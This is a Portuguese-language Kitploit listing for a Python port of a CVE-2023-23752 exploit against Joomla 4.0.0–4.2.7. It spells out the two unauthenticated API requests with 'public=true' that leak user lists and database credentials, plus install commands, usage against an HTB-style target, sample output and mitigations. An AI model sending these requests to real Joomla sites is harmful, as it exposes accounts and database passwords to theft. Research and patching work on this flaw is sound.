Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-23752 — Python port of the CVE-2023-23752 exploit — Joomla! < 4.2.8 unauthenticated information disclosure (user list + DB credentials leak) | Kitploit
Ferramentas/GitHubGitHub/bardlaudian/cve-2023-23752
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubbardlaudian/cve-2023-23752

CVE-2023-23752

Python port of the CVE-2023-23752 exploit — Joomla! < 4.2.8 unauthenticated information disclosure (user list + DB credentials leak)

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-23752 — Joomla! < 4.2.8 Divulgação de Informações Não Autenticada

Python CVE Platform

⚠️ Aviso: Esta ferramenta é destinada apenas para fins educacionais e testes de penetração autorizados. Use-a apenas contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. O uso não autorizado é ilegal.


Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Como Funciona
  • Requisitos
  • Instalação
  • Uso
  • Exemplos
  • Mitigações
  • Créditos
  • Referências

Visão Geral

O Joomla! é um dos sistemas de gerenciamento de conteúdo (CMS) de código aberto mais amplamente utilizados. As versões 4.0.0 a 4.2.7 expõem dois endpoints de API sem controle de acesso adequado, permitindo que um invasor não autenticado recupere informações sensíveis: contas de usuário registradas e, em configurações vulneráveis, as credenciais do banco de dados do site.

A vulnerabilidade foi descoberta por Zewei Zhang do NSFOCUS TIANJI Lab e divulgada ao projeto Joomla!, que lançou um patch na versão 4.2.8. Foi atribuído CVE-2023-23752.

Este repositório contém uma portabilidade para Python do exploit Ruby original lançado pela ACCEIS.


Detalhes da Vulnerabilidade


Como Funciona

Os endpoints do serviço web da API REST do Joomla! devem aplicar autenticação e verificações de acesso antes de retornar dados. Nas versões afetadas, dois endpoints falham ao realizar essa verificação corretamente quando chamados com o parâmetro de consulta public=true, tratando a solicitação como se viesse de um nível de acesso "público" anônimo que deveria expor apenas dados não sensíveis — mas, em vez disso, vaza informações internas.

Os Endpoints Vulneráveis

root@kitploit:~
GET /api/index.php/v1/users?public=true
GET /api/index.php/v1/config/application?public=true
  • O endpoint users retorna a lista completa de contas registradas: id, nome de exibição, nome de usuário, email e associação a grupos.
  • O endpoint config retorna a configuração da aplicação, incluindo — quando o instalador não foi removido/endurecido — o host do banco de dados, usuário, senha, nome do banco, prefixo e configurações de criptografia.

Fluxo do Exploit

O script automatiza os seguintes passos:

root@kitploit:~
1. Enviar solicitação GET para /api/index.php/v1/users?public=true
2. Analisar a resposta JSON:API e extrair registros de usuários
3. Enviar solicitação GET para /api/index.php/v1/config/application?public=true
4. Analisar a resposta JSON:API e extrair configurações do site + banco de dados
5. Imprimir ambos os conjuntos de dados no console

Nenhuma autenticação, sessão ou token CSRF é necessário em nenhum momento — todo o ataque consiste em duas solicitações GET não autenticadas.


Requisitos

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests --break-system-packages

Instalação

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2023-23752.git
cd CVE-2023-23752
pip install requests --break-system-packages

Uso

root@kitploit:~
usage: CVE-2023-23752.py [-h] url

positional arguments:
  url         URL base do alvo, ex.: http://dev.devvortex.htb

options:
  -h, --help  mostra esta mensagem de ajuda e sai

Exemplos

Uso básico

root@kitploit:~
python3 CVE-2023-23752.py http://127.0.0.1:4242

Contra um alvo estilo HTB

root@kitploit:~
python3 CVE-2023-23752.py http://dev.devvortex.htb

Exemplo de saída

root@kitploit:~
=== Usuários ===
  [123] Administrator (admin) - [email protected] - ['Super Users']

=== Informações do site ===
  Nome do site: My Site
  Editor: tinymce
  Captcha: 0
  Acesso: 1
  Status de debug: False

=== Informações do banco de dados ===
  Tipo de BD: mysqli
  Host do BD: localhost
  Usuário do BD: joomla_user
  Senha do BD: ********
  Nome do BD: joomla_db
  Prefixo do BD: sd8f2_
  Criptografia do BD: 0

Mitigações

  • Atualize o Joomla! para a versão 4.2.8 ou superior — esta é a única correção completa.
  • Restrinja o acesso a /api/index.php/* no servidor web ou WAF se a atualização não for possível imediatamente.
  • Rotacione as credenciais de quaisquer contas ou usuários de banco de dados que possam ter sido expostos por este endpoint antes da aplicação do patch.
  • Monitore os logs de acesso em busca de solicitações não autenticadas para os caminhos do serviço web /api/index.php/v1/.

Créditos

  • Vulnerabilidade descoberta por: Zewei Zhang, NSFOCUS TIANJI Lab
  • Exploit original (Ruby): noraj (Alexandre ZANNI) pela ACCEIS — repositório original
  • Portabilidade para Python: Bardlaudian

Referências

  • NVD — CVE-2023-23752
  • Exploit-DB — EDB-51334
  • Aviso PacketStorm
  • Aviso de Segurança Joomla!
  • Aviso do Descobridor — NSFOCUS
  • Exploit Ruby Original — Acceis
Baixar ferramenta
CampoValor
CVECVE-2023-23752
AfetadoJoomla! 4.0.0 – 4.2.7
TipoControle de Acesso Incorreto / Divulgação de Informações
PrivilégiosNenhum (não autenticado)
ImpactoDivulgação de contas de usuário e credenciais do banco de dados
PatchJoomla! 4.2.8 (lançado em 2023)